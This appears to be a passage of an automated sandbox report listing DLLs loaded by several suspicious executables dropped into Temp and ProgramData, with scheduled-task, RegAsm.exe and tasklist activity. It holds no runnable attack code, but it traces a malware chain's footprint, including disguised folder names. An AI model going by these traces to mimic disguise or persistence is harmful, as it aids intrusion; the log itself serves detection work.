Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: version.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: amsi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasman.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: secur32.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: schannel.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: icu.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: version.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: amsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: userenv.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: profapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wldp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasman.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: propsys.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: edputil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: netutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: slc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sppc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\System32\conhost.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
